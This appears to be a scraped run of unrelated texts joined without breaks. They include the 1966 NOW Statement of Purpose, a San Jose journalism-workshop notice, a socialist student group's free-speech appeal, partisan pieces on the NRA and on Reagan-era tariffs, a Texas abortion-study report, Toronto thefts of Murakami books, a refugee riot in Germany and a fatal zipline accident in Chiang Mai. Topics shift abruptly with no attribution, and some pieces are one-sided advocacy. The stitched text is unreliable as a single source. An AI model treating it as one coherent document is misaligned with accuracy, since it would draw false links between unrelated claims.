We believe the time has come to move beyond the abstract argument, discussion and symposia over the status and special nature of women which has raged in America in recent years; the time has come to confront, with concrete action, the conditions that now prevent women from enjoying the equality of opportunity and freedom of choice which is their right, as individual Americans, and as human beings.
NOW is dedicated to the proposition that women, first and foremost, are human beings, who, like all other people in our society, must have the chance to develop their fullest human potential. We believe that women can achieve such equality only by accepting to the full the challenges and responsibilities they share with all other people in our society, as part of the decision-making mainstream of American political, economic and social life.
We organize to initiate or support action, nationally, or in any part of this nation, by individuals or organizations, to break through the silken curtain of prejudice and discrimination against women in government, industry, the professions, the churches, the political parties, the judiciary, the labor unions, in education, science, medicine, law, religion and every other field of importance in American society.
Enormous changes taking place in our society make it both possible and urgently necessary to advance the unfinished revolution of women toward true equality, now. With a life span lengthened to nearly 75 years it is no longer either necessary or possible for women to devote the greater part of their lives to child- rearing; yet childbearing and rearing which continues to be a most important part of most women's lives — still is used to justify barring women from equal professional and economic participation and advance.
Today's technology has reduced most of the productive chores which women once performed in the home and in mass-production industries based upon routine unskilled labor. This same technology has virtually eliminated the quality of muscular strength as a criterion for filling most jobs, while intensifying American industry's need for creative intelligence. In view of this new industrial revolution created by automation in the mid-twentieth century, women can and must participate in old and new fields of society in full equality — or become permanent outsiders.
Despite all the talk about the status of American women in recent years, the actual position of women in the United States has declined, and is declining, to an alarming degree throughout the 1950's and 60's. Although 46.4% of all American women between the ages of 18 and 65 now work outside the home, the overwhelming majority — 75% — are in routine clerical, sales, or factory jobs, or they are household workers, cleaning women, hospital attendants. About two-thirds of Negro women workers are in the lowest paid service occupations. Working women are becoming increasingly — not less — concentrated on the bottom of the job ladder. As a consequence full-time women workers today earn on the average only 60% of what men earn, and that wage gap has been increasing over the past twenty-five years in every major industry group. In 1964, of all women with a yearly income, 89% earned under $5,000 a year; half of all full-time year round women workers earned less than $3,690; only 1.4% of full-time year round women workers had an annual income of $10,000 or more.
Further, with higher education increasingly essential in today's society, too few women are entering and finishing college or going on to graduate or professional school. Today, women earn only one in three of the B.A.'s and M.A.'s granted, and one in ten of the Ph.D.'s.
In all the professions considered of importance to society, and in the executive ranks of industry and government, women are losing ground. Where they are present it is only a token handful. Women comprise less than 1% of federal judges; less than 4% of all lawyers; 7% of doctors. Yet women represent 51% of the U.S. population. And, increasingly, men are replacing women in the top positions in secondary and elementary schools, in social work, and in libraries — once thought to be women's fields.
Official pronouncements of the advance in the status of women hide not only the reality of this dangerous decline, but the fact that nothing is being done to stop it. The excellent reports of the President's Commission on the Status of Women and of the State Commissions have not been fully implemented. Such Commissions have power only to advise. They have no power to enforce their recommendation; nor have they the freedom to organize American women and men to press for action on them. The reports of these commissions have, however, created a basis upon which it is now possible to build. Discrimination in employment on the basis of sex is now prohibited by federal law, in Title VII of the Civil Rights Act of 1964. But although nearly one-third of the cases brought before the Equal Employment Opportunity Commission during the first year dealt with sex discrimination and the proportion is increasing dramatically, the Commission has not made clear its intention to enforce the law with the same seriousness on behalf of women as of other victims of discrimination. Many of these cases were Negro women, who are the victims of double discrimination of race and sex. Until now, too few women's organizations and official spokesmen have been willing to speak out against these dangers facing women. Too many women have been restrained by the fear of being called `feminist.” There is no civil rights movement to speak for women, as there has been for Negroes and other victims of discrimination. The National Organization for Women must therefore begin to speak.
WE BELIEVE that the power of American law, and the protection guaranteed by the U.S. Constitution to the civil rights of all individuals, must be effectively applied and enforced to isolate and remove patterns of sex discrimination, to ensure equality of opportunity in employment and education, and equality of civil and political rights and responsibilities on behalf of women, as well as for Negroes and other deprived groups.
We realize that women's problems are linked to many broader questions of social justice; their solution will require concerted action by many groups. Therefore, convinced that human rights for all are indivisible, we expect to give active support to the common cause of equal rights for all those who suffer discrimination and deprivation, and we call upon other organizations committed to such goals to support our efforts toward equality for women.
WE DO NOT ACCEPT the token appointment of a few women to high-level positions in government and industry as a substitute for serious continuing effort to recruit and advance women according to their individual abilities. To this end, we urge American government and industry to mobilize the same resources of ingenuity and command with which they have solved problems of far greater difficulty than those now impeding the progress of women.
WE BELIEVE that this nation has a capacity at least as great as other nations, to innovate new social institutions which will enable women to enjoy the true equality of opportunity and responsibility in society, without conflict with their responsibilities as mothers and homemakers. In such innovations, America does not lead the Western world, but lags by decades behind many European countries. We do not accept the traditional assumption that a woman has to choose between marriage and motherhood, on the one hand, and serious participation in industry or the professions on the other. We question the present expectation that all normal women will retire from job or profession for 10 or 15 years, to devote their full time to raising children, only to reenter the job market at a relatively minor level. This, in itself, is a deterrent to the aspirations of women, to their acceptance into management or professional training courses, and to the very possibility of equality of opportunity or real choice, for all but a few women. Above all, we reject the assumption that these problems are the unique responsibility of each individual woman, rather than a basic social dilemma which society must solve. True equality of opportunity and freedom of choice for women requires such practical, and possible innovations as a nationwide network of child-care centers, which will make it unnecessary for women to retire completely from society until their children are grown, and national programs to provide retraining for women who have chosen to care for their children full-time.
WE BELIEVE that it is as essential for every girl to be educated to her full potential of human ability as it is for every boy — with the knowledge that such education is the key to effective participation in today's economy and that, for a girl as for a boy, education can only be serious where there is expectation that it will be used in society. We believe that American educators are capable of devising means of imparting such expectations to girl students. Moreover, we consider the decline in the proportion of women receiving higher and professional education to be evidence of discrimination. This discrimination may take the form of quotas against the admission of women to colleges, and professional schools; lack of encouragement by parents, counselors and educators; denial of loans or fellowships; or the traditional or arbitrary procedures in graduate and professional training geared in terms of men, which inadvertently discriminate against women. We believe that the same serious attention must be given to high school dropouts who are girls as to boys.
WE REJECT the current assumptions that a man must carry the sole burden of supporting himself, his wife, and family, and that a woman is automatically entitled to lifelong support by a man upon her marriage, or that marriage, home and family are primarily woman's world and responsibility — hers, to dominate — his to support. We believe that a true partnership between the sexes demands a different concept of marriage, an equitable sharing of the responsibilities of home and children and of the economic burdens of their support. We believe that proper recognition should be given to the economic and social value of homemaking and child-care. To these ends, we will seek to open a reexamination of laws and mores governing marriage and divorce, for we believe that the current state of `half-equity” between the sexes discriminates against both men and women, and is the cause of much unnecessary hostility between the sexes.
WE BELIEVE that women must now exercise their political rights and responsibilities as American citizens. They must refuse to be segregated on the basis of sex into separate-and-not-equal ladies' auxiliaries in the political parties, and they must demand representation according to their numbers in the regularly constituted party committees — at local, state, and national levels — and in the informal power structure, participating fully in the selection of candidates and political decision-making, and running for office themselves.
IN THE INTERESTS OF THE HUMAN DIGNITY OF WOMEN, we will protest, and endeavor to change, the false image of women now prevalent in the mass media, and in the texts, ceremonies, laws, and practices of our major social institutions. Such images perpetuate contempt for women by society and by women for themselves. We are similarly opposed to all policies and practices — in church, state, college, factory, or office — which, in the guise of protectiveness, not only deny opportunities but also foster in women self-denigration, dependence, and evasion of responsibility, undermine their confidence in their own abilities and foster contempt for women.
NOW WILL HOLD ITSELF INDEPENDENT OF ANY POLITICAL PARTY in order to mobilize the political power of all women and men intent on our goals. We will strive to ensure that no party, candidate, president, senator, governor, congressman, or any public official who betrays or ignores the principle of full equality between the sexes is elected or appointed to office. If it is necessary to mobilize the votes of men and women who believe in our cause, in order to win for women the final right to be fully free and equal human beings, we so commit ourselves.
WE BELIEVE THAT women will do most to create a new image of women by acting now, and by speaking out in behalf of their own equality, freedom, and human dignity – – not in pleas for special privilege, nor in enmity toward men, who are also victims of the current, half-equality between the sexes – – but in an active, self-respecting partnership with men. By so doing, women will develop confidence in their own ability to determine actively, in partnership with men, the conditions of their life, their choices, their future and their society.
This Statement of Purpose was written by Betty Friedan, author of “The Feminine Mystique”.
Relevant documents: 1998 Declaration of Sentiments for NOW
Fourteen budding journalists participated in the 24th annual Mosaic high school summer journalism workshop, held May 29 through June 9, 2017, on the San Jose State University campus.
After an introduction to journalism, students proposed story and photo ideas then set out reporting and photographing. Under the guidance of Mosaic instructors, the students produced an online news site and a 12-page print newspaper on subjects ranging from unlicensed teen drivers to a new neighborhood boxing gym to untreated teen anxiety.
In Mosaic, students learn by doing what interests them, and work closely with advisers. The instructor-student ratio is approximately 4 to 1. The staff to student ration of 2 to 1.
Mosaic is free of charge to students. It is funded by generous grants from the Dow Jones News Fund, the Brandenburg Family Foundation, Elaine Elkin, alumni and community donors. Mosaic is supported by San Jose State University, the Bay Area News Group, which includes the Mercury News, and the NewsGuild.
The workshop culminates with a field trip to the Mercury News newsroom and with delivery of the print edition of student news stories, opinion columns and photographs.
This year's instructors were photographer Karl Mondon, columnist Sal Pizarro, reporter Robert Salonga, all from the Bay Area News Group; former Mercury News reporter and teacher Maya Suryaraman; and former Monterey Herald reporter, author and investigative journalist Julie Reynolds. Editorial assistants were Mosaic alumni Mahima Dutt, Magali Gauthier and Marcos Leon.
For information about Mosaic, contact Co-directors Joe Rodriguez, joerodriguez0326@gmail.com or 408-998-8079, or Sharon Noguchi, snoguchi@bayareanewsgroup.com or 408-271-3775.
December 5, 2012
University officials are trying to limit free speech at UMass Boston with their decision to freeze the budget of the International Socialist Organization's campus chapter. Claiming such offenses as posting violations, the administration is also threatening to revoke the club's status. In this statement, ISO members urge fellow students to protest the university's plans to silence dissent against at UMass.
ACTIVISTS IN the International Socialist Organization (ISO) are asking for solidarity in our fight to defend free speech and student organizing at the University of Massachusetts (UMass) Boston. University officials' charges of "mismanagement of funds" and "posting violations" have resulted in our group's funds being confiscated, making it impossible to organize events on campus.
The ISO isn't the only student group that faces bureaucratic obstacles to organizing on this working-class campus. Publicizing events at UMass Boston can be tremendously difficult because of the administration's posting policy, which restricts the number of flyers that can be put up to just 55 and the area where they can be posted.
In addition, UMass' funding system requires that student clubs plan the details of an entire semester's schedule before the semester starts. If a student group hopes to respond to changing events in the world or on campus, this rule makes organizing unnecessarily difficult.
It appears that the administration has decided to prioritize penalizing student groups and enforcing restrictions and bureaucracy--just as the Board of Trustees and administration plan to increase student fees.
We believe that the Undergraduate Student Government (USG) and the administration are selectively enforcing the rules and, as a result, are targeting student activists and political dissent. This is nothing new, as a pattern of increased harassment has emerged over the last two semesters.
During these semesters, we have been involved in publicizing and challenging the administrations fee hikes and parking fare increases. If these attacks on free speech continue, ISO members fear that this could lead to the complete elimination of the group's club status and funding.
As a result of the public defense campaign we have built and the hundreds of faculty, students, alumni and concerned people around the country who have vocalized their opposition to this attack on free speech and their support for student activism, the USG and administration have changed their tone and are giving us a final meeting to make our case. Every e-mail sent to the administration and every signature on our petition has made a tremendous difference and has put us in a great position to win.
That said, this is not over. Our funds are still frozen, and we are still depending on your solidarity in our efforts to pressure the university to grant us our funds.
Please continue to:
Share the petition in support of the ISO through Facebook and e-mail.
Write e-mails to Student Events and Organizations Chair Ignacio Chaparro, Student Activities Director Shelby Harris and Chancellor J. Keith Motley.
Join us at our final hearing on December 5, at 3 p.m. in Room 3315 of the Campus Center.
While it's very important to us that we get our funds as soon as possible so that we can use them to build upcoming events, this campaign is most importantly about the fight for winning a different kind of university. We need a campus where students have a bigger voice and more power to participate in decision-making. We need a university that encourages critical thinking and political engagement with the world around us.
Students should be rewarded for trying to engage with the issues that are affecting our lives not punished. Winning this campaign would be an important step forward for the possibilities of creating such a school.
On Friday night's edition of “The Rachel Maddow Show,” host Rachel Maddow coldly assessed Wayne LaPierre's extravagantly out-of-touch press conference on Friday and deemed it to be the political equivalent of a giant “Rick-rolling” of the American public.
She began the segment by giving a brief rundown of the concept of “Rick-rolling,” which she explained as an “Internet, made-you-look” joke, in which one tricks another person into clicking a link to the video for U.K. pop singer Rick Astley's 1987 single “Never Gonna Give You Up.”
“And yes, it's weird and yes, it's annoying, but it's annoying on purpose,” she said. “It's annoying not just because you didn't get to see the noteworthy thing you were promised, that you were interested enough in to click, but you also get this song stuck in your head and it stays there forever. It's the ‘Rick-roll.'”
Earlier this week, the National Rifle Association (NRA) announced that it would be making a “meaningful contribution” to the gun safety debate in the wake of the horrible tragedy in Newtown Connecticut.
This “meaningful contribution” was to be unveiled at NRA chief lobbyist Wayne LaPierre's press conference on Friday, a rambling, disorienting affair in which the aging LaPierre put forth an idea of forming an “armed cordon” around our schools of retired police and fire officials, decommissioned military personnel and other gun-carrying volunteers.
“It's the same old thing and now it's going to be stuck in my head forever!” Maddow wailed, rolling the video of Rick Astley's “Never Gonna Give You Up.”
“The NRA ‘Rick-rolled' the whole country,” she said. “They promised us something that sounded new, something that sounded meaningful, maybe something this time that would be a change, that would be worth tuning in for, something you hadn't heard before from this very important group, right?”
Wrong. It's the same old thing. And now it's going to be stuck in our heads forever.
Watch the clip, embedded via MSNBC, below:
Visit NBCNews.com for breaking news, world news, and news about the economy
The members of the #NeverTrump movement cite, in part, Donald Trump's position on trade as a reason why they cannot support their party's presumptive nominee, chosen by Republican voters.
They argue that Trump's position on trade represents a betrayal of the Ronald Reagan legacy that defines virtually all thinking and rhetoric among the professional conservative class in Washington, D.C.
However, there is one significant problem with this line of attack: namely, Reagan's record on trade far more closely resembles Trump's position than it resembles the view of those in the #NeverTrump movement. In fact, by their own definition, Reagan would have been a radical “protectionist”—meaning professional conservatives who are #NeverTrump would also have been for #NeverReagan.
Two of the most vocal members of the #NeverTrump movement are the Daily Caller's Jamie Weinstein and talk radio host Mark Levin.
In a Wednesday CNN interview explaining why he is now backing Hillary Clinton over Trump, Weinstein cited Trump's position on trade:
He's no conservative and neither is Hillary Clinton. She's been terrible on domestic policy her entire career. There's probably not a single issue I agree with, but she's never proposed a 45% tariff on Chinese goods coming into the United States, which may be the single worst economic proposal proposed during this election season that would be economic catastrophe.
Weinstein told viewers that his own declaration is “amazing:” He said, “I would have to cast my ballot for Hillary Clinton, which is amazing that I'm telling you this, over the Republican nominee who is Donald Trump.”
Weinstein — who previously advised beltway Republicans not to read too much into Eric Cantor's ousting and its implications for the 2016 Republican primary, along with other predictions that did not bear out this election — has repeatedly warned that a President Trump's trade policy could doom the nation.
“Imposing a 45% tariff on China won't promote job growth,” Weinstein wrote on Twitter.
“Has there been a worse economic idea proposed than a 45% tariff?” Weinstein asked.
Like Weinstein, Mark Levin has similarly attacked Trump's signature position on enforcing trade deals and cracking down of foreign trade cheating. “A tariff is nothing more than a tax on the consumer,” Levin said last month on LevinTV. “If you put a 45% tariff on something, that means the consumer is paying 45 percent more for an iPhone, for a Toyota, for whatever it is that they're purchasing … it's not going to create and protect American jobs. It never does. In fact what it creates is economic contraction. That's just Mark's view,” Levin said.
Levin then proceeded to praise Ronald Reagan for creating a “massive explosion of free enterprise.”
“Reagan created an economic environment where we created 25 million jobs through his administration, Bush's, into Clinton's,” Levin said.
However, neither Levin nor Weinstein mention that President Reagan did not hesitate to impose duties, tariffs, and other trade fairness measures to enforce trade rules — the same measures which they now criticize Trump for supporting.
Indeed, Reagan was harshly rebuked by so-called “free traders” for taking “protectionist” actions such as a 45% tariff on Japanese motorcycles to save the Harley-Davidson Motor Company of Milwaukee, Wisconsin.
Reagan's action seems similar to Trump's call for a 45% tariff on Chinese imports. Our trade deficit with China today massively dwarfs any trade imbalances with Japan in Reagan's day. Indeed, the U.S. trade deficit with China recently hit a new record of $365 billion. The United States lost one-third of its manufacturing jobs in the NAFTA-WTO era– in other words, in the years following NAFTA's enactment and China's subsequent entrance in the World Trade Organization in 2001.
President Reagan also imposed a tariff of 100% on Japanese semiconductors. As the L.A. Times wrote in 1987: “President Reagan on Friday imposed tariffs of 100% on medium-sized Japanese color televisions, powerful lap-top and desk computers and certain hand power tools, to retaliate for Japan's failure to allow more American products into its markets and to halt the underpriced ‘dumping' of Japanese semiconductor computer chips in other nations.”
By 1991, the total U.S. trade deficit had fallen to $66.2 billion. In 2015, the total U.S. trade in goods deficit was $736 billion.
In fact, in a blistering condemnation of former President Reagan, the “free trade” Cato Institute helpfully published a list of actions President Reagan took to protect American jobs and manufacturing. The analysis, published in 1988, described Reagan as “the most protectionist president since Herbert Hoover, the heavyweight champion of protectionists.”
The analysis states that Reagan did the following:
Forced Japan to accept restraints on auto exports…
Tightened up considerably the quotas on imported sugar…
Negotiated to increase restrictiveness of the Multifiber Arrangement and extended restrictions to previously unrestricted textiles. The administration unilaterally changed the rule of origin in order to restrict textile and apparel imports further and imposed a special ceiling on textiles from the People's Republic of China…
Required 18 countries–including Brazil, Spain, South Korea, Japan, Mexico, South Africa, Finland, and Australia, as well as the European Community–to accept ‘voluntary restraint agreements' to reduce steel imports, guaranteeing domestic producers a share of the American market…
Raised tariffs on Canadian lumber and cedar shingles…
Removed Third World countries from the duty-free import program for developing nations on several occasions.
Pressed Japan to force its automakers to buy more American-made parts…
Redefined ‘dumping' in order ‘to make it easier to bring charges of unfair trade practices against certain competitors.'
In fact, in 2011 Robert Lighthizer, a deputy U.S. trade representative during Reagan's administration, penned an op-ed explaining how Trump's position on trade aligns with President Reagan's. In his piece entitled, “Donald Trump is no liberal on trade,” Lighthizer wrote:
Mr. Trump's GOP opponents accuse him of wanting to get tough on China and of being a protectionist. Since when does that mean one is not a conservative? For most of its 157-year history, the Republican Party has been the party of building domestic industry by using trade policy to promote U.S. exports and fend off unfairly traded imports. American conservatives have had that view for even longer. […] Every Republican president starting with Lincoln – and for almost 100 years thereafter – generally supported tariffs, while Democrats tended to promote free trade.
Lighthizer cited the records of Ronald Reagan, Richard Nixon, William McKinley, William Howard Taft, and Calvin Coolidge, writing:
Do you think that any of the conservatives and Republicans listed above would allow a foreign adversary to use currency manipulation, subsidies, theft of intellectual property and dozens of other forms of state-sponsored, government-organized unfair trade to run up a more than $270 billion trade surplus with us and to take U.S. jobs? […] On a purely intellectual level, how does allowing China to constantly rig trade in its favor advance the core conservative goal of making markets more efficient? […] When viewed in this context, the recent blind faith some Republicans have shown toward free trade actually represents more of an aberration than a hallmark of true American conservatism.
All of these facts about Reagan's record were excluded from Levin's condemnation of Trump's “economic protectionism.”
Levin's attack of Trump came during an interview with Sen. Marco Rubio.
Prior to joining the #NeverTrump movement, Levin had accused Rubio of being a “liar” guided by “unprincipled ambition” who ran a “deceitful” campaign that relied upon “unseemly Alinsky tactics.” Levin said that Rubio “lied his way to get elected to the United States Senate,” has “no significant accomplishments other than his election to various public offices,” and was the chief architect of an amnesty bill, which would have “created permanent open borders.”
However, after joining the #NeverTrump movement, Levin warmly hosted Rubio on his program — describing Rubio as a “great” and “wonderful guest.” Throughout the interview, Levin asked Rubio questions that seemed to invite Rubio to attack Trump's position on trade. Levin said:
I've been speaking out against this notion of economic protectionism, massive tariffs. We've been through that before. Hoover did it and the Republican Congress did it. It exacerbated a terrible recession, helped create a depression, gave an opportunity for the left and FDR to really change our constitutional system, our economic system. And yet there is, I would argue, still a minority of people— but they call themselves populists, or what have you, who aggressively push this agenda.
Levin's suggestion that the Smoot-Hawley tariff caused the Great Depression has been repeatedly debunked. As Pat Buchanan has explained:
It was a tariff enacted in June 1930, nine months after the Crash of 1929, which occurred, as Milton Friedman won a Nobel Prize for proving, when the stock market bubble, caused by the Fed's easy money policy, burst. Smoot-Hawley had nothing to do with a Depression that began in 1929 and lasted through FDR's first two terms. This is a liberal myth.
Buchanan has been debunking this liberal myth for over two decades, writing in 1994:
Americans today are being indoctrinated in false history. And high among the falsehoods is that ‘free trade' with foreign nations made America prosperous, and protectionism always made her poor. This is the catechism of the One Worlders, but it is politically correct history — not truth. All four presidents on Mt. Rushmore were protectionists… No nation has ever risen to pre-eminence through free trade… Smoot and Hawley aren't responsible for America's decline. Rather, it is those who make constant sport of them, and who need to be driven from power, if America is to reclaim the lost dream.
Contrary to Levin's suggestion that “economic protectionism” is only supported by a small minority, polling data shows Republican voters are among the most skeptical of so-called “free trade” deals, more so than Democrats. According to Pew, by a nearly five-to-one margin GOP voters believe so-called “free trade” lower wages rather than raising them. Similarly the latest exit polls from Wisconsin's primary showed that a majority of Wisconsin GOP voters believe that foreign trade kills jobs. However, despite the views of Wisconsin Republican voters, Wisconsin's Paul Ryan has been one of Congress's most vocal advocates for trade globalism. In 2015, Ryan acted as President Obama's “partner” in their effort to fast track the Trans-Pacific Partnership. Interestingly, exit polls revealed that a majority of Wisconsin Republicans (51%) say they feel betrayed by the party, which is currently led by Speaker Ryan.
Moreover, taking the Levin-Weinstein argument at face value, the United States would quite literally be unable to enforce the terms of any trade deal, ever. The remedy prescribed in trade deals for improper foreign subsidies — whether it be product dumping, currency manipulation, or other unfair government subsidy — is to apply a countervailing duty or a tariff to negate the cheating behavior. Thus, if one opposes any action that makes a cheap foreign product more expensive, then all cheating is permissible all of the time. Since any foreign country can use its central bank or government to unfairly produce cheaper goods, then, carried to its logical conclusion, there would be no manufacturing left in the United States at all.
However, many in the #NeverTrump camp do not seem particularly bothered by the collapse of American working-class communities.
For instance, National Review‘s Kevin D. Williamson has said that he believes these communities “deserve to die”:
The truth about these dysfunctional, downscale communities is that they deserve to die. Economically, they are negative assets. Morally, they are indefensible. Forget all your cheap theatrical Bruce Springsteen crap. Forget your sanctimony about struggling Rust Belt factory towns and your conspiracy theories about the wily Orientals stealing our jobs. Forget your goddamned gypsum, and, if he has a problem with that, forget Ed Burke, too. The white American underclass is in thrall to a vicious, selfish culture whose main products are misery and used heroin needles. Donald Trump's speeches make them feel good. So does OxyContin.
In a subsequent piece attempting to defend this controversial declaration, Williamson says that his answer to people living in “a community or a family that offers you little or nothing” is to simply say “F*** ‘em” and move. Williamson explains that if they have nothing to offer you, these communities — and thus presumably all the memories, culture, values, and institutions therein —“have it coming”:
My answer to what to do about a community or a family that offers you little or nothing and that may be actively working against your real long-term interest is for me the same today as it was 25 years ago, when I first was forced to consider it and answered in the argot of my own downscale tornado-bait community: ‘F*** 'em.'… If there's nothing for you in Garbutt but penury, dysfunction, and addiction, then get the hell out. If that means that communities in upstate New York or eastern Kentucky or west Texas die, so what? If that's all they have to offer, then they have it coming.
Listen to the discussion of this article on Breitbart News Saturday on SiriusXM:
AUSTIN - Texas clinics have performed 10 percent to 15 percent fewer abortions since the state enacted strict requirements two years ago for women seeking the procedure, according to preliminary findings of a new study.
But researchers said Wednesday that shift appears to stem more from obstacles created by the 2011 laws - including a 24-hour waiting period and mandatory ultrasounds - than from women changing their minds because of them.
"Our findings so far indicate these regulations do not positively impact women's decision-making and, in fact, are burdensome for women," said Dr. Daniel Grossman of Ibis Reproductive Health, a Massa­chusetts nonprofit focused on improving "women's reproductive autonomy."
The study - conducted by researchers at Ibis, the University of Texas and the University of Alabama at Birmingham - was based on data collected from the state's three largest abortion clinic systems, as well as surveys of more than 27 individual clinics and 300 women from across the state.
Grossman emphasized the final results will not be published until later this year, but the preliminary findings offer the first glimpse of how the state's tougher abortion requirements have affected the prevalence of the procedure.
The Department of State Health Services, which also collects abortion data, has not yet released official numbers for 2011 or 2012, the two years after Texas' stricter laws were passed.
"There has been an overall decline nationally in abortions," Grossman said. "But this appears to be more pronounced."
More waiting, expense
According to the study, women had to wait on average 3.7 days between their initial consultations with a doctor and their abortions - nearly four times the period required by law - because of difficulties with clinic scheduling.
For the two doctor visits, they traveled an average of 84 miles round-trip and typically incurred additional costs of about $146 for travel expenses, child care and lost wages, the research suggests.
And despite the waiting period, 89 percent indicated they were as sure about their decision to have an abortion before their initial consultation as they were afterward, the study found.
The 24-hour waiting period was just one in a series of tighter abortion provisions passed by lawmakers in 2011. The Republican-controlled House also cut funding to family planning that year, and it overwhelmingly voted to require doctors to explain the possible medical consequences of abortion as well as provide women seeking the procedure with an audio recording of the fetal heartbeat.
Advocates for the laws argued that they would allow women to make better-informed decisions about whether to have an abortion.
"As a woman and a physician, I would be concerned about any non-emergency procedure where the patient doesn't ever meet or have a prior relationship with their doctor," State Sen. Donna Campbell, R-New Braunfels, said Wednesday.
But abortion rights advocates described the measures as misguided attempts to control women's reproductive rights.
Kicking off this year's legislative session, Texas Gov. Rick Perry has pledged to back efforts that would further impede abortion availability.
"The ideal world is one without abortion," Perry told a crowd rallied at the Capitol in January. "Until then, we will continue to pass laws to ensure that they are rare as possible."
So far, multiple bills have been filed that would further restrict access to abortions, including one that would shorten the window in which a woman could undergo an abortion to 20 weeks after conception - the point at which many anti-abortion activists argue that a fetus begins to feel pain.
Well-being not goal?
"These measures have nothing to do with the well-being of women and everything to do with their manipulation," state Rep. Jessica Farrar, D-Houston, chair of the Texas Womens' Health Caucus, said Wednesday.
Farrar said she intends to introduce a bill this week that would roll back the 24-hour waiting period requirement, but conceded that its chances of passing were slim.
"I'm not expecting a miracle to happen," said Farrar, who chairs the Texas Womens' Health Caucus. "But if we walk away from what happened in the last session, everyone will think that this is OK."
Japanese author Haruki Murakami may be known worldwide for novels that straddle the border between the dreamworld and reality.
But in Toronto he's better known as the most popular author among literary thieves, at least according to the city's bookstore owners.
An entire shelf dedicated to Murakami books disappeared in December at the Roncesvalles store A Good Read.
"I lost $800 the last two times this guy hit me," owner Gary Kir told CBC Toronto. "They're very easily converted into cash, because they're very high in demand and they don't turn up that often used."
Gary Kirk, the owner of A Good Read in Roncesvalles, had his complete collection of Haruki Murakami books stolen twice in December. (Tyna Poulin/CBC News)
The Japanese novelist's best-known works include Norwegian Wood, Sputnik Sweetheart, The Wind-Up Bird Chronicle and more recently, 1Q84.
And they've all been lifted, Kirk alleges.
"They took my Norwegian Woods, my Sputniks, all of them," Kirk said, adding that he doubts his book thief has ever cracked open a Murakami.
Haruki Murakami's books have sold millions of copies around the world. (Bernat Armangue/Associated Press)
Murakami is the new Kerouac in terms of stolen authors
Derek McCormack has worked at bookstores in Toronto for 25 years and says the most shoplifted names come and go in waves.
"It used to be all the beats," said McCormack, of Type Books on Queen Street West. "Jack Kerouac and Allen Ginsberg. Then it became [Vladimir] Nabokov by far — you couldn't keep Lolita on the shelf."
"Most Stolen Books" shelf: Congrats to <a href="https://twitter.com/hashtag/HarukiMurakami?src=hash">#HarukiMurakami</a>, <a href="https://twitter.com/BretEastonEllis">@BretEastonEllis</a>, <a href="https://twitter.com/chuckpalahniuk">@chuckpalahniuk</a>, <a href="https://twitter.com/hashtag/KurtVonnegut?src=hash">#KurtVonnegut</a> & others <a href="https://t.co/c7uEGztajF">pic.twitter.com/c7uEGztajF</a> —@VintageAnchor These days he says Murakami's popularity among millennial readers is driving the most recent theft ring.
"There's like a ton of university students who don't have tons of money and are happy to pay five bucks for a book regardless of where it came from."
Other used bookstores being blamed for buying stolen books
Both McCormack and Kirk believe there's a black market being fuelled by some of their competitors in the used book scene. Kirk says a stolen Murakami title will be resold to another used bookstore for about $3.
"The more unscrupulous used bookstores will then charge $10 to make a profit," he alleges.
These guys are pros; they know what they want and they get the books in large quantity. - Derek McCormack, Type Books
Book thieves haven't evolved much since McCormack has been in the business, he said.
"These guys are pros; they know what they want and they get the books in large quantity."
The problem's aggravated by those who McCormack alleges knowingly buy stolen products — when someone comes in trying to sell four or five copies of the same book.
"There were a couple of used bookstores up on Bloor you could go up to and be guaranteed to find what just left your store," he said.
Kirk says it doesn't matter the title, a book thief will see it's a Murakami and take it. (CBC News/TYNA POULIN)
Both McCormack and Kirk say police haven't cracked down on book theft.
"I can imagine being a cop and thinking, 'Really? Four copies of a book and this is why I'm here?' But it does trickle down — the more books disappear, the worse your bottom line gets."
​'We know who the guy is'
Kirk circulated pictures of the man he believes to be his book thief and said several other store owners recognized him.
He follows the same routine with them, too, Kirk alleges. The thief will look in the window, wait until it's busy, and then go in and pull an entire shelf of books into a bag.
Kirk wants other store owners to mark their books, to only deal in credit cards when buying used books in order to create a paper trail, and to mark a book's bought and sold dates inside its covers.
"Then the [real] owners can follow up and know where to go to find them."
A German police officer has been severely injured in a weekend riot by drunken refugees armed with iron bars who smashed their accommodation centre to smithereens.
Two men from Togo and six from Ghana went berserk at their asylum home in Rees-Haldern, near the Dutch border a DAY after moving in because they were 'unhappy' with their quarters.
They complained there was no mobile phone reception in the building's reception area.
A German police officer has been severely injured in a weekend riot by drunken refugees armed with iron bars who smashed their accommodation centre to smithereens (file picture of migrants in Dusseldorf, whose camp was damaged in a fire in June 2016)
The police officer suffered a 'complicated' break in one foot, but it isn't clear how they sustained the injury (file photo)
Two dozen armed police had to respond to emergency calls from staff at the centre as the men aged between 18 and 28 laid waste to furniture, windows, doors and fittings. They even tried to penetrate the security room where guards were forced to barricade themselves in for their own safety.
The injured police officer suffered a 'complicated' break in one foot, although whether this was the result of a blow from one of the migrants is unclear.
After the Saturday night riot all eight men were arrested and are now awaiting trial on charges of a serious breach of the peace, criminal damage, resisting arrest, causing actual bodily harm and property damage.
Police said the refugees went into the nearby village from their accommodation on Saturday on a drinking bender.
German police reported last year that they have had to turn out hundreds of times to accommodation centres for refugees when infighting turned violent.
Tourists enjoy a Flying Squirrels adventure in Chiang Mai in this file photo taken in August 2015. (File photo by Karnjana Ayuwatanachai)
Police are investigating the death of a Chinese woman during an adventure ride at a tourist attraction in Chiang Mai's Mae Rim district.
Chinese tourists accompanying Wang Qi, 32, have raised questions about the woman's death.
The operator of the Flying Squirrels adventure at Pong Khrai village in Mae Rim district told them Wang had died of heart failure on the zipline adventure ride on Sunday afternoon. A post-mortem examination at Nakornping Hospital concluded she had suffered a broken neck and shoulder bones.
The tourists asked the Chinese consulate in Chiang Mai to help find out the real cause of her death.
Pol Col Suchart Kan-ngern, chief investigator at Mae Rim police station, said police were rushed to the scene upon being alerted that the Chinese woman had died of heart failure on the treetops ride.
Pol Col Suchart said he would today follow up the case and promised to ensure justice for all, Thai media reported on Tuesday.
A source said witnesses told police investigators that Wang was about to reach a spot on the ride where two male staff stood ready to take hold of her, but they allegedly made a mistake and the woman fell to the ground.
The aerial adventure has 32 treetop stations. Customers swing, abseil, bicycle, skateboard, held by slings attached to their bodies, from one tree platform to the next, the longest ride being 600 metres between stations. This thrill ride is popular with tourists.
About 14 tourist venues provide a similar adventure activity in the northern province.
Unlimited Income Leads To Unlimited Outcome
